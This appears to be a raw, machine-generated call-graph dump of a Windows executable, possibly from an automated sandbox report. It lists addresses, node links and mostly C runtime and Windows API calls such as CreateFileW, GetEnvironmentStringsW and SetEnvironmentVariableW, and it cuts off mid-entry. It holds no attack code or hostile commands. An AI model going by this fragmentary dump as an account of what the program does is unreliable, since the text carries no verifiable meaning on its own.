7ff62cc71696 17725->17727 17728 7ff62cc72910 54 API calls 17726->17728 17729 7ff62cc716b8 17727->17729 17730 7ff62cc7169e 17727->17730 17733 7ff62cc71671 17728->17733 17732 7ff62cc80744 73 API calls 17729->17732 17731 7ff62cc72710 54 API calls 17730->17731 17734 7ff62cc716ae 17731->17734 17735 7ff62cc716cd 17732->17735 17733->16424 17738 7ff62cc800bc 74 API calls 17734->17738 17736 7ff62cc716f9 17735->17736 17737 7ff62cc716d1 17735->17737 17762 7ff62cc7717b 17761->17762 17764 7ff62cc77134 17761->17764 17762->16424 17764->17762 17898 7ff62cc85094 17764->17898 17766 7ff62cc74191 17765->17766 17767 7ff62cc744d0 49 API calls 17766->17767 17768 7ff62cc741cb 17767->17768 17769 7ff62cc744d0 49 API calls 17768->17769 17770 7ff62cc741db 17769->17770 17771 7ff62cc7422c 17770->17771 17772 7ff62cc741fd 17770->17772 17774 7ff62cc74100 51 API calls 17771->17774 17929 7ff62cc74100 17772->17929 17775 7ff62cc7422a 17774->17775 17776 7ff62cc7428c 17775->17776 17777 7ff62cc74257 17775->17777 17778 7ff62cc74100 51 API calls 17776->17778 17936 7ff62cc77ce0 17777->17936 17810 7ff62cc71c80 49 API calls 17809->17810 17811 7ff62cc74464 17810->17811 17811->16424 17835 7ff62cc745b0 108 API calls 17834->17835 17836 7ff62cc7108c 17835->17836 17837 7ff62cc710a9 17836->17837 17838 7ff62cc71094 17836->17838 17840 7ff62cc80744 73 API calls 17837->17840 17839 7ff62cc72710 54 API calls 17838->17839 17845 7ff62cc710a4 __std_exception_copy 17839->17845 17841 7ff62cc710bf 17840->17841 17842 7ff62cc710e6 17841->17842 17843 7ff62cc710c3 17841->17843 17847 7ff62cc710f7 17842->17847 17848 7ff62cc71122 17842->17848 17844 7ff62cc84f78 _get_daylight 11 API calls 17843->17844 17846 7ff62cc710c8 17844->17846 17845->17718 17850 7ff62cc84f78 _get_daylight 11 API calls 17847->17850 17851 7ff62cc71129 17848->17851 17859 7ff62cc7113c 17848->17859 17857 7ff62cc8040c _fread_nolock 53 API calls 17857->17859 17859->17857 17899 7ff62cc850a1 17898->17899 17900 7ff62cc850ce 17898->17900 17901 7ff62cc84f78 _get_daylight 11 API calls 17899->17901 17902 7ff62cc85058 17899->17902 17903 7ff62cc850f1 17900->17903 17905 7ff62cc8510d 17900->17905 17906 7ff62cc850ab 17901->17906 17902->17764 17904 7ff62cc84f78 _get_daylight 11 API calls 17903->17904 17907 7ff62cc850f6 17904->17907 17913 7ff62cc84fbc 17905->17913 17909 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 17906->17909 17910 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 17907->17910 17911 7ff62cc850b6 17909->17911 17912 7ff62cc85101 17910->17912 17911->17764 17912->17764 17914 7ff62cc84fdb 17913->17914 17915 7ff62cc84fe0 17913->17915 17914->17912 17915->17914 17916 7ff62cc8b1c0 __CxxCallCatchBlock 45 API calls 17915->17916 17917 7ff62cc84ffb 17916->17917 17921 7ff62cc8d9f4 17917->17921 17922 7ff62cc8501e 17921->17922 17923 7ff62cc8da09 17921->17923 17925 7ff62cc8da60 17922->17925 17923->17922 17924 7ff62cc93374 45 API calls 17923->17924 17924->17922 17930 7ff62cc74126 17929->17930 17931 7ff62cc849f4 49 API calls 17930->17931 17933 7ff62cc7414c 17931->17933 17993 7ff62cc85f38 17992->17993 17994 7ff62cc85f5e 17993->17994 17996 7ff62cc85f91 17993->17996 17995 7ff62cc84f78 _get_daylight 11 API calls 17994->17995 17997 7ff62cc85f63 17995->17997 17999 7ff62cc85f97 17996->17999 18000 7ff62cc85fa4 17996->18000 17998 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 17997->17998 18001 7ff62cc74606 17998->18001 18002 7ff62cc84f78 _get_daylight 11 API calls 17999->18002 18011 7ff62cc8ac98 18000->18011 18001->16450 18002->18001 18024 7ff62cc90348 EnterCriticalSection 18011->18024 18385 7ff62cc87968 18384->18385 18388 7ff62cc87444 18385->18388 18387 7ff62cc87981 18387->16460 18389 7ff62cc8745f 18388->18389 18390 7ff62cc8748e 18388->18390 18391 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 18389->18391 18398 7ff62cc854dc EnterCriticalSection 18390->18398 18393 7ff62cc8747f 18391->18393 18393->18387 18400 7ff62cc7feb3 18399->18400 18401 7ff62cc7fee1 18399->18401 18402 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 18400->18402 18408 7ff62cc7fed3 18401->18408 18409 7ff62cc854dc EnterCriticalSection 18401->18409 18402->18408 18408->16464 18411 7ff62cc7cb62 RtlLookupFunctionEntry 18410->18411 18412 7ff62cc7cb78 RtlVirtualUnwind 18411->18412 18413 7ff62cc7c97b 18411->18413 18412->18411 18412->18413 18414 7ff62cc7c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18413->18414 18416 7ff62cc745b0 108 API calls 18415->18416 18417 7ff62cc71493 18416->18417 18418 7ff62cc714bc 18417->18418 18419 7ff62cc7149b 18417->18419 18421 7ff62cc80744 73 API calls 18418->18421 18420 7ff62cc72710 54 API calls 18419->18420 18422 7ff62cc714ab 18420->18422 18423 7ff62cc714d1 18421->18423 18422->16506 18424 7ff62cc714f8 18423->18424 18425 7ff62cc714d5 18423->18425 18522 7ff62cc76365 18521->18522 18523 7ff62cc71c80 49 API calls 18522->18523 18524 7ff62cc763a1 18523->18524 18525 7ff62cc763cd 18524->18525 18526 7ff62cc763aa 18524->18526 18528 7ff62cc74620 49 API calls 18525->18528 18527 7ff62cc72710 54 API calls 18526->18527 18544 7ff62cc763c3 18527->18544 18529 7ff62cc763e5 18528->18529 18530 7ff62cc76403 18529->18530 18532 7ff62cc72710 54 API calls 18529->18532 18533 7ff62cc74550 10 API calls 18530->18533 18531 7ff62cc7c5c0 _log10_special 8 API calls 18534 7ff62cc7336e 18531->18534 18532->18530 18535 7ff62cc7640d 18533->18535 18534->16575 18552 7ff62cc764f0 18534->18552 18536 7ff62cc7641b 18535->18536 18537 7ff62cc79070 3 API calls 18535->18537 18537->18536 18544->18531 18701 7ff62cc753f0 18552->18701 18811 7ff62cc8b1c0 __CxxCallCatchBlock 45 API calls 18810->18811 18812 7ff62cc8a451 18811->18812 18815 7ff62cc8a574 18812->18815 18824 7ff62cc936c0 18815->18824 18850 7ff62cc93678 18824->18850 18855 7ff62cc90348 EnterCriticalSection 18850->18855 20423 7ff62cc91720 20434 7ff62cc97454 20423->20434 20435 7ff62cc97461 20434->20435 20436 7ff62cc8a9b8 __free_lconv_num 11 API calls 20435->20436 20437 7ff62cc9747d 20435->20437 20436->20435 20438 7ff62cc8a9b8 __free_lconv_num 11 API calls 20437->20438 20439 7ff62cc91729 20437->20439 20438->20437 20440 7ff62cc90348 EnterCriticalSection 20439->20440 18912 7ff62cc85698 18913 7ff62cc856b2 18912->18913 18914 7ff62cc856cf 18912->18914 18915 7ff62cc84f58 _fread_nolock 11 API calls 18913->18915 18914->18913 18916 7ff62cc856e2 CreateFileW 18914->18916 18917 7ff62cc856b7 18915->18917 18918 7ff62cc8574c 18916->18918 18919 7ff62cc85716 18916->18919 18920 7ff62cc84f78 _get_daylight 11 API calls 18917->18920 18963 7ff62cc85c74 18918->18963 18937 7ff62cc857ec GetFileType 18919->18937 18924 7ff62cc856bf 18920->18924 18928 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 18924->18928 18926 7ff62cc85755 18931 7ff62cc84eec _fread_nolock 11 API calls 18926->18931 18927 7ff62cc85780 18984 7ff62cc85a34 18927->18984 18933 7ff62cc856ca 18928->18933 18929 7ff62cc8572b CloseHandle 18929->18933 18930 7ff62cc85741 CloseHandle 18930->18933 18936 7ff62cc8575f 18931->18936 18936->18933 18938 7ff62cc8583a 18937->18938 18939 7ff62cc858f7 18937->18939 18940 7ff62cc85866 GetFileInformationByHandle 18938->18940 18944 7ff62cc85b70 21 API calls 18938->18944 18941 7ff62cc85921 18939->18941 18942 7ff62cc858ff 18939->18942 18945 7ff62cc85912 GetLastError 18940->18945 18946 7ff62cc8588f 18940->18946 18943 7ff62cc85944 PeekNamedPipe 18941->18943 18961 7ff62cc858e2 18941->18961 18942->18945 18947 7ff62cc85903 18942->18947 18943->18961 18953 7ff62cc85854 18944->18953 18950 7ff62cc84eec _fread_nolock 11 API calls 18945->18950 18948 7ff62cc85a34 51 API calls 18946->18948 18949 7ff62cc84f78 _get_daylight 11 API calls 18947->18949 18951 7ff62cc8589a 18948->18951 18949->18961 18950->18961 19001 7ff62cc85994 18951->19001 18952 7ff62cc7c5c0 _log10_special 8 API calls 18955 7ff62cc85724 18952->18955 18953->18940 18953->18961 18955->18929 18955->18930 18957 7ff62cc85994 10 API calls 18958 7ff62cc858b9 18957->18958 18959 7ff62cc85994 10 API calls 18958->18959 18960 7ff62cc858ca 18959->18960 18960->18961 18962 7ff62cc84f78 _get_daylight 11 API calls 18960->18962 18961->18952 18962->18961 18964 7ff62cc85caa 18963->18964 18965 7ff62cc85d42 __std_exception_copy 18964->18965 18966 7ff62cc84f78 _get_daylight 11 API calls 18964->18966 18967 7ff62cc7c5c0 _log10_special 8 API calls 18965->18967 18968 7ff62cc85cbc 18966->18968 18969 7ff62cc85751 18967->18969 18970 7ff62cc84f78 _get_daylight 11 API calls 18968->18970 18969->18926 18969->18927 18971 7ff62cc85cc4 18970->18971 18972 7ff62cc87e78 45 API calls 18971->18972 18973 7ff62cc85cd9 18972->18973 18974 7ff62cc85ceb 18973->18974 18975 7ff62cc85ce1 18973->18975 18977 7ff62cc84f78 _get_daylight 11 API calls 18974->18977 18976 7ff62cc84f78 _get_daylight 11 API calls 18975->18976 18982 7ff62cc85ce6 18976->18982 18978 7ff62cc85cf0 18977->18978 18978->18965 18979 7ff62cc84f78 _get_daylight 11 API calls 18978->18979 18980 7ff62cc85cfa 18979->18980 18981 7ff62cc87e78 45 API calls 18980->18981 18981->18982 18982->18965 18983 7ff62cc85d34 GetDriveTypeW 18982->18983 18983->18965 18986 7ff62cc85a5c 18984->18986 18985 7ff62cc8578d 18994 7ff62cc85b70 18985->18994 18986->18985 19008 7ff62cc8f794 18986->19008 18988 7ff62cc85af0 18988->18985 18989 7ff62cc8f794 51 API calls 18988->18989 18990 7ff62cc85b03 18989->18990 18990->18985 18991 7ff62cc8f794 51 API calls 18990->18991 18992 7ff62cc85b16 18991->18992 18992->18985 18993 7ff62cc8f794 51 API calls 18992->18993 18993->18985 18995 7ff62cc85b8a 18994->18995 18996 7ff62cc85bc1 18995->18996 18997 7ff62cc85b9a 18995->18997 18998 7ff62cc8f628 21 API calls 18996->18998 18999 7ff62cc84eec _fread_nolock 11 API calls 18997->18999 19000 7ff62cc85baa 18997->19000 18998->19000 18999->19000 19000->18936 19002 7ff62cc859bd FileTimeToSystemTime 19001->19002 19003 7ff62cc859b0 19001->19003 19004 7ff62cc859d1 SystemTimeToTzSpecificLocalTime 19002->19004 19005 7ff62cc859b8 19002->19005 19003->19002 19003->19005 19004->19005 19006 7ff62cc7c5c0 _log10_special 8 API calls 19005->19006 19007 7ff62cc858a9 19006->19007 19007->18957 19009 7ff62cc8f7c5 19008->19009 19010 7ff62cc8f7a1 19008->19010 19013 7ff62cc8f7ff 19009->19013 19016 7ff62cc8f81e 19009->19016 19010->19009 19011 7ff62cc8f7a6 19010->19011 19012 7ff62cc84f78 _get_daylight 11 API calls 19011->19012 19014 7ff62cc8f7ab 19012->19014 19015 7ff62cc84f78 _get_daylight 11 API calls 19013->19015 19018 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19014->19018 19019 7ff62cc8f804 19015->19019 19017 7ff62cc84fbc 45 API calls 19016->19017 19024 7ff62cc8f82b 19017->19024 19020 7ff62cc8f7b6 19018->19020 19021 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19019->19021 19020->18988 19022 7ff62cc8f80f 19021->19022 19022->18988 19023 7ff62cc9054c 51 API calls 19023->19024 19024->19022 19024->19023 18859 7ff62cc899d1 18860 7ff62cc8a448 45 API calls 18859->18860 18861 7ff62cc899d6 18860->18861 18862 7ff62cc89a47 18861->18862 18863 7ff62cc899fd GetModuleHandleW 18861->18863 18871 7ff62cc898d4 18862->18871 18863->18862 18869 7ff62cc89a0a 18863->18869 18869->18862 18885 7ff62cc89af8 GetModuleHandleExW 18869->18885 18891 7ff62cc90348 EnterCriticalSection 18871->18891 18886 7ff62cc89b55 18885->18886 18887 7ff62cc89b2c GetProcAddress 18885->18887 18889 7ff62cc89b61 18886->18889 18890 7ff62cc89b5a FreeLibrary 18886->18890 18888 7ff62cc89b3e 18887->18888 18888->18886 18889->18862 18890->18889 20739 7ff62cc9ac53 20740 7ff62cc9ac63 20739->20740 20743 7ff62cc854e8 LeaveCriticalSection 20740->20743 19201 7ff62cc89dc0 19204 7ff62cc89d3c 19201->19204 19211 7ff62cc90348 EnterCriticalSection 19204->19211 20744 7ff62cc8b040 20745 7ff62cc8b045 20744->20745 20749 7ff62cc8b05a 20744->20749 20750 7ff62cc8b060 20745->20750 20751 7ff62cc8b0aa 20750->20751 20752 7ff62cc8b0a2 20750->20752 20754 7ff62cc8a9b8 __free_lconv_num 11 API calls 20751->20754 20753 7ff62cc8a9b8 __free_lconv_num 11 API calls 20752->20753 20753->20751 20755 7ff62cc8b0b7 20754->20755 20756 7ff62cc8a9b8 __free_lconv_num 11 API calls 20755->20756 20757 7ff62cc8b0c4 20756->20757 20758 7ff62cc8a9b8 __free_lconv_num 11 API calls 20757->20758 20759 7ff62cc8b0d1 20758->20759 20760 7ff62cc8a9b8 __free_lconv_num 11 API calls 20759->20760 20761 7ff62cc8b0de 20760->20761 20762 7ff62cc8a9b8 __free_lconv_num 11 API calls 20761->20762 20763 7ff62cc8b0eb 20762->20763 20764 7ff62cc8a9b8 __free_lconv_num 11 API calls 20763->20764 20765 7ff62cc8b0f8 20764->20765 20766 7ff62cc8a9b8 __free_lconv_num 11 API calls 20765->20766 20767 7ff62cc8b105 20766->20767 20768 7ff62cc8a9b8 __free_lconv_num 11 API calls 20767->20768 20769 7ff62cc8b115 20768->20769 20770 7ff62cc8a9b8 __free_lconv_num 11 API calls 20769->20770 20771 7ff62cc8b125 20770->20771 20776 7ff62cc8af04 20771->20776 20790 7ff62cc90348 EnterCriticalSection 20776->20790 19450 7ff62cc90938 19451 7ff62cc9095c 19450->19451 19453 7ff62cc9096c 19450->19453 19452 7ff62cc84f78 _get_daylight 11 API calls 19451->19452 19456 7ff62cc90961 19452->19456 19454 7ff62cc90c4c 19453->19454 19457 7ff62cc9098e 19453->19457 19455 7ff62cc84f78 _get_daylight 11 API calls 19454->19455 19458 7ff62cc90c51 19455->19458 19459 7ff62cc909af 19457->19459 19581 7ff62cc90ff4 19457->19581 19461 7ff62cc8a9b8 __free_lconv_num 11 API calls 19458->19461 19462 7ff62cc90a21 19459->19462 19464 7ff62cc909d5 19459->19464 19468 7ff62cc90a15 19459->19468 19461->19456 19466 7ff62cc8ec08 _get_daylight 11 API calls 19462->19466 19480 7ff62cc909e4 19462->19480 19463 7ff62cc90ace 19475 7ff62cc90aeb 19463->19475 19481 7ff62cc90b3d 19463->19481 19596 7ff62cc89730 19464->19596 19469 7ff62cc90a37 19466->19469 19468->19463 19468->19480 19602 7ff62cc9719c 19468->19602 19472 7ff62cc8a9b8 __free_lconv_num 11 API calls 19469->19472 19471 7ff62cc8a9b8 __free_lconv_num 11 API calls 19471->19456 19476 7ff62cc90a45 19472->19476 19473 7ff62cc909df 19477 7ff62cc84f78 _get_daylight 11 API calls 19473->19477 19474 7ff62cc909fd 19474->19468 19479 7ff62cc90ff4 45 API calls 19474->19479 19478 7ff62cc8a9b8 __free_lconv_num 11 API calls 19475->19478 19476->19468 19476->19480 19484 7ff62cc8ec08 _get_daylight 11 API calls 19476->19484 19477->19480 19482 7ff62cc90af4 19478->19482 19479->19468 19480->19471 19481->19480 19483 7ff62cc9344c 40 API calls 19481->19483 19491 7ff62cc90af9 19482->19491 19638 7ff62cc9344c 19482->19638 19485 7ff62cc90b7a 19483->19485 19488 7ff62cc90a67 19484->19488 19486 7ff62cc8a9b8 __free_lconv_num 11 API calls 19485->19486 19489 7ff62cc90b84 19486->19489 19493 7ff62cc8a9b8 __free_lconv_num 11 API calls 19488->19493 19489->19480 19489->19491 19490 7ff62cc90c40 19495 7ff62cc8a9b8 __free_lconv_num 11 API calls 19490->19495 19491->19490 19496 7ff62cc8ec08 _get_daylight 11 API calls 19491->19496 19492 7ff62cc90b25 19494 7ff62cc8a9b8 __free_lconv_num 11 API calls 19492->19494 19493->19468 19494->19491 19495->19456 19497 7ff62cc90bc8 19496->19497 19498 7ff62cc90bd0 19497->19498 19499 7ff62cc90bd9 19497->19499 19500 7ff62cc8a9b8 __free_lconv_num 11 API calls 19498->19500 19501 7ff62cc8a514 __std_exception_copy 37 API calls 19499->19501 19502 7ff62cc90bd7 19500->19502 19503 7ff62cc90be8 19501->19503 19508 7ff62cc8a9b8 __free_lconv_num 11 API calls 19502->19508 19504 7ff62cc90bf0 19503->19504 19505 7ff62cc90c7b 19503->19505 19647 7ff62cc972b4 19504->19647 19507 7ff62cc8a970 _isindst 17 API calls 19505->19507 19510 7ff62cc90c8f 19507->19510 19508->19456 19513 7ff62cc90cb8 19510->19513 19519 7ff62cc90cc8 19510->19519 19511 7ff62cc90c17 19514 7ff62cc84f78 _get_daylight 11 API calls 19511->19514 19512 7ff62cc90c38 19516 7ff62cc8a9b8 __free_lconv_num 11 API calls 19512->19516 19515 7ff62cc84f78 _get_daylight 11 API calls 19513->19515 19517 7ff62cc90c1c 19514->19517 19538 7ff62cc90cbd 19515->19538 19516->19490 19518 7ff62cc8a9b8 __free_lconv_num 11 API calls 19517->19518 19518->19502 19520 7ff62cc90fab 19519->19520 19521 7ff62cc90cea 19519->19521 19522 7ff62cc84f78 _get_daylight 11 API calls 19520->19522 19523 7ff62cc90d07 19521->19523 19666 7ff62cc910dc 19521->19666 19524 7ff62cc90fb0 19522->19524 19527 7ff62cc90d7b 19523->19527 19529 7ff62cc90d2f 19523->19529 19533 7ff62cc90d6f 19523->19533 19526 7ff62cc8a9b8 __free_lconv_num 11 API calls 19524->19526 19526->19538 19531 7ff62cc90da3 19527->19531 19534 7ff62cc8ec08 _get_daylight 11 API calls 19527->19534 19550 7ff62cc90d3e 19527->19550 19528 7ff62cc90e2e 19543 7ff62cc90e4b 19528->19543 19551 7ff62cc90e9e 19528->19551 19681 7ff62cc8976c 19529->19681 19531->19533 19536 7ff62cc8ec08 _get_daylight 11 API calls 19531->19536 19531->19550 19533->19528 19533->19550 19687 7ff62cc9705c 19533->19687 19539 7ff62cc90d95 19534->19539 19542 7ff62cc90dc5 19536->19542 19537 7ff62cc8a9b8 __free_lconv_num 11 API calls 19537->19538 19546 7ff62cc8a9b8 __free_lconv_num 11 API calls 19539->19546 19540 7ff62cc90d57 19540->19533 19549 7ff62cc910dc 45 API calls 19540->19549 19541 7ff62cc90d39 19547 7ff62cc84f78 _get_daylight 11 API calls 19541->19547 19544 7ff62cc8a9b8 __free_lconv_num 11 API calls 19542->19544 19545 7ff62cc8a9b8 __free_lconv_num 11 API calls 19543->19545 19544->19533 19548 7ff62cc90e54 19545->19548 19546->19531 19547->19550 19555 7ff62cc9344c 40 API calls 19548->19555 19558 7ff62cc90e5a 19548->19558 19549->19533 19550->19537 19551->19550 19552 7ff62cc9344c 40 API calls 19551->19552 19553 7ff62cc90edc 19552->19553 19554 7ff62cc8a9b8 __free_lconv_num 11 API calls 19553->19554 19556 7ff62cc90ee6 19554->19556 19559 7ff62cc90e86 19555->19559 19556->19550 19556->19558 19557 7ff62cc90f9f 19561 7ff62cc8a9b8 __free_lconv_num 11 API calls 19557->19561 19558->19557 19562 7ff62cc8ec08 _get_daylight 11 API calls 19558->19562 19560 7ff62cc8a9b8 __free_lconv_num 11 API calls 19559->19560 19560->19558 19561->19538 19563 7ff62cc90f2b 19562->19563 19564 7ff62cc90f33 19563->19564 19565 7ff62cc90f3c 19563->19565 19567 7ff62cc8a9b8 __free_lconv_num 11 API calls 19564->19567 19566 7ff62cc904e4 37 API calls 19565->19566 19568 7ff62cc90f4a 19566->19568 19569 7ff62cc90f3a 19567->19569 19570 7ff62cc90fdf 19568->19570 19571 7ff62cc90f52 SetEnvironmentVariableW 19568->19571 19575 7ff62cc8a9b8 __free_lconv_num 11 API calls 19569->19575 19574 7ff62cc8a970 _isindst 17 API calls 19570->19574 19572 7ff62cc90f76 19571->19572 19573 7ff62cc90f97 19571->19573 19576 7ff62cc84f78 _get_daylight 11 API calls 19572->19576 19578 7ff62cc8a9b8 __free_lconv_num 11 API calls 19573->19578 19577 7ff62cc90ff3 19574->19577 19575->19538 19579 7ff62cc90f7b 19576->19579 19578->19557 19580 7ff62cc8a9b8 __free_lconv_num 11 API calls 19579->19580 19580->19569 19582 7ff62cc91029 19581->19582 19588 7ff62cc91011 19581->19588 19583 7ff62cc8ec08 _get_daylight 11 API calls 19582->19583 19591 7ff62cc9104d 19583->19591 19584 7ff62cc910ae 19586 7ff62cc8a9b8 __free_lconv_num 11 API calls 19584->19586 19585 7ff62cc8a574 __CxxCallCatchBlock 45 API calls 19587 7ff62cc910d8 19585->19587 19586->19588 19588->19459 19589 7ff62cc8ec08 _get_daylight 11 API calls 19589->19591 19590 7ff62cc8a9b8 __free_lconv_num 11 API calls 19590->19591 19591->19584 19591->19589 19591->19590 19592 7ff62cc8a514 __std_exception_copy 37 API calls 19591->19592 19593 7ff62cc910bd 19591->19593 19595 7ff62cc910d2 19591->19595 19592->19591 19594 7ff62cc8a970 _isindst 17 API calls 19593->19594 19594->19595 19595->19585 19597 7ff62cc89740 19596->19597 19598 7ff62cc89749 19596->19598 19597->19598 19711 7ff62cc89208 19597->19711 19598->19473 19598->19474 19603 7ff62cc962c4 19602->19603 19604 7ff62cc971a9 19602->19604 19605 7ff62cc962d1 19603->19605 19609 7ff62cc96307 19603->19609 19606 7ff62cc84fbc 45 API calls 19604->19606 19607 7ff62cc84f78 _get_daylight 11 API calls 19605->19607 19622 7ff62cc96278 19605->19622 19610 7ff62cc971dd 19606->19610 19611 7ff62cc962db 19607->19611 19608 7ff62cc96331 19612 7ff62cc84f78 _get_daylight 11 API calls 19608->19612 19609->19608 19613 7ff62cc96356 19609->19613 19614 7ff62cc971e2 19610->19614 19615 7ff62cc971f3 19610->19615 19618 7ff62cc9720a 19610->19618 19616 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19611->19616 19617 7ff62cc96336 19612->19617 19623 7ff62cc84fbc 45 API calls 19613->19623 19628 7ff62cc96341 19613->19628 19614->19468 19619 7ff62cc84f78 _get_daylight 11 API calls 19615->19619 19620 7ff62cc962e6 19616->19620 19621 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19617->19621 19625 7ff62cc97214 19618->19625 19626 7ff62cc97226 19618->19626 19624 7ff62cc971f8 19619->19624 19620->19468 19621->19628 19622->19468 19623->19628 19631 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19624->19631 19627 7ff62cc84f78 _get_daylight 11 API calls 19625->19627 19629 7ff62cc9724e 19626->19629 19630 7ff62cc97237 19626->19630 19632 7ff62cc97219 19627->19632 19628->19468 19943 7ff62cc98fbc 19629->19943 19934 7ff62cc96314 19630->19934 19631->19614 19635 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19632->19635 19635->19614 19637 7ff62cc84f78 _get_daylight 11 API calls 19637->19614 19639 7ff62cc9346e 19638->19639 19640 7ff62cc9348b 19638->19640 19639->19640 19641 7ff62cc9347c 19639->19641 19646 7ff62cc93495 19640->19646 19983 7ff62cc97ca8 19640->19983 19642 7ff62cc84f78 _get_daylight 11 API calls 19641->19642 19645 7ff62cc93481 memcpy_s 19642->19645 19645->19492 19990 7ff62cc97ce4 19646->19990 19648 7ff62cc84fbc 45 API calls 19647->19648 19649 7ff62cc9731a 19648->19649 19650 7ff62cc97328 19649->19650 20002 7ff62cc8ef94 19649->20002 20005 7ff62cc8551c 19650->20005 19654 7ff62cc97414 19657 7ff62cc97425 19654->19657 19658 7ff62cc8a9b8 __free_lconv_num 11 API calls 19654->19658 19655 7ff62cc84fbc 45 API calls 19656 7ff62cc97397 19655->19656 19660 7ff62cc8ef94 5 API calls 19656->19660 19663 7ff62cc973a0 19656->19663 19659 7ff62cc90c13 19657->19659 19661 7ff62cc8a9b8 __free_lconv_num 11 API calls 19657->19661 19658->19657 19659->19511 19659->19512 19660->19663 19661->19659 19662 7ff62cc8551c 14 API calls 19664 7ff62cc973fb 19662->19664 19663->19662 19664->19654 19665 7ff62cc97403 SetEnvironmentVariableW 19664->19665 19665->19654 19667 7ff62cc9111c 19666->19667 19674 7ff62cc910ff 19666->19674 19668 7ff62cc8ec08 _get_daylight 11 API calls 19667->19668 19669 7ff62cc91140 19668->19669 19670 7ff62cc911a1 19669->19670 19675 7ff62cc8ec08 _get_daylight 11 API calls 19669->19675 19676 7ff62cc8a9b8 __free_lconv_num 11 API calls 19669->19676 19677 7ff62cc904e4 37 API calls 19669->19677 19678 7ff62cc911b0 19669->19678 19680 7ff62cc911c4 19669->19680 19672 7ff62cc8a9b8 __free_lconv_num 11 API calls 19670->19672 19671 7ff62cc8a574 __CxxCallCatchBlock 45 API calls 19673 7ff62cc911ca 19671->19673 19672->19674 19674->19523 19675->19669 19676->19669 19677->19669 19679 7ff62cc8a970 _isindst 17 API calls 19678->19679 19679->19680 19680->19671 19682 7ff62cc89785 19681->19682 19683 7ff62cc8977c 19681->19683 19682->19540 19682->19541 19683->19682 20027 7ff62cc8927c 19683->20027 19688 7ff62cc97069 19687->19688 19691 7ff62cc97096 19687->19691 19689 7ff62cc9706e 19688->19689 19688->19691 19690 7ff62cc84f78 _get_daylight 11 API calls 19689->19690 19693 7ff62cc97073 19690->19693 19692 7ff62cc970da 19691->19692 19695 7ff62cc970f9 19691->19695 19709 7ff62cc970ce __crtLCMapStringW 19691->19709 19694 7ff62cc84f78 _get_daylight 11 API calls 19692->19694 19696 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19693->19696 19697 7ff62cc970df 19694->19697 19698 7ff62cc97103 19695->19698 19699 7ff62cc97115 19695->19699 19700 7ff62cc9707e 19696->19700 19703 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19697->19703 19701 7ff62cc84f78 _get_daylight 11 API calls 19698->19701 19702 7ff62cc84fbc 45 API calls 19699->19702 19700->19533 19704 7ff62cc97108 19701->19704 19705 7ff62cc97122 19702->19705 19703->19709 19706 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19704->19706 19705->19709 20074 7ff62cc98b78 19705->20074 19706->19709 19709->19533 19710 7ff62cc84f78 _get_daylight 11 API calls 19710->19709 19712 7ff62cc89221 19711->19712 19713 7ff62cc8921d 19711->19713 19734 7ff62cc92660 19712->19734 19713->19598 19726 7ff62cc8955c 19713->19726 19718 7ff62cc8923f 19760 7ff62cc892ec 19718->19760 19719 7ff62cc89233 19720 7ff62cc8a9b8 __free_lconv_num 11 API calls 19719->19720 19720->19713 19723 7ff62cc8a9b8 __free_lconv_num 11 API calls 19724 7ff62cc89266 19723->19724 19725 7ff62cc8a9b8 __free_lconv_num 11 API calls 19724->19725 19725->19713 19727 7ff62cc89585 19726->19727 19732 7ff62cc8959e 19726->19732 19727->19598 19728 7ff62cc90858 WideCharToMultiByte 19728->19732 19729 7ff62cc8ec08 _get_daylight 11 API calls 19729->19732 19730 7ff62cc8962e 19731 7ff62cc8a9b8 __free_lconv_num 11 API calls 19730->19731 19731->19727 19732->19727 19732->19728 19732->19729 19732->19730 19733 7ff62cc8a9b8 __free_lconv_num 11 API calls 19732->19733 19733->19732 19735 7ff62cc89226 19734->19735 19736 7ff62cc9266d 19734->19736 19740 7ff62cc9299c GetEnvironmentStringsW 19735->19740 19779 7ff62cc8b294 19736->19779 19741 7ff62cc8922b 19740->19741 19742 7ff62cc929cc 19740->19742 19741->19718 19741->19719 19743 7ff62cc90858 WideCharToMultiByte 19742->19743 19744 7ff62cc92a1d 19743->19744 19745 7ff62cc92a24 FreeEnvironmentStringsW 19744->19745 19746 7ff62cc8d66c _fread_nolock 12 API calls 19744->19746 19745->19741 19747 7ff62cc92a37 19746->19747 19748 7ff62cc92a3f 19747->19748 19749 7ff62cc92a48 19747->19749 19750 7ff62cc8a9b8 __free_lconv_num 11 API calls 19748->19750 19751 7ff62cc90858 WideCharToMultiByte 19749->19751 19752 7ff62cc92a46 19750->19752 19753 7ff62cc92a6b 19751->19753 19752->19745 19754 7ff62cc92a6f 19753->19754 19755 7ff62cc92a79 19753->19755 19756 7ff62cc8a9b8 __free_lconv_num 11 API calls 19754->19756 19757 7ff62cc8a9b8 __free_lconv_num 11 API calls 19755->19757 19758 7ff62cc92a77 FreeEnvironmentStringsW 19756->19758 19757->19758 19758->19741 19761 7ff62cc89311 19760->19761 19762 7ff62cc8ec08 _get_daylight 11 API calls 19761->19762 19773 7ff62cc89347 19762->19773 19763 7ff62cc8a9b8 __free_lconv_num 11 API calls 19764 7ff62cc89247 19763->19764 19764->19723 19765 7ff62cc893c2 19766 7ff62cc8a9b8 __free_lconv_num 11 API calls 19765->19766 19766->19764 19767 7ff62cc8ec08 _get_daylight 11 API calls 19767->19773 19768 7ff62cc893b1 19928 7ff62cc89518 19768->19928 19770 7ff62cc8a514 __std_exception_copy 37 API calls 19770->19773 19772 7ff62cc8a9b8 __free_lconv_num 11 API calls 19776 7ff62cc8934f 19772->19776 19773->19765 19773->19767 19773->19768 19773->19770 19774 7ff62cc893e7 19773->19774 19775 7ff62cc8a9b8 __free_lconv_num 11 API calls 19773->19775 19773->19776 19777 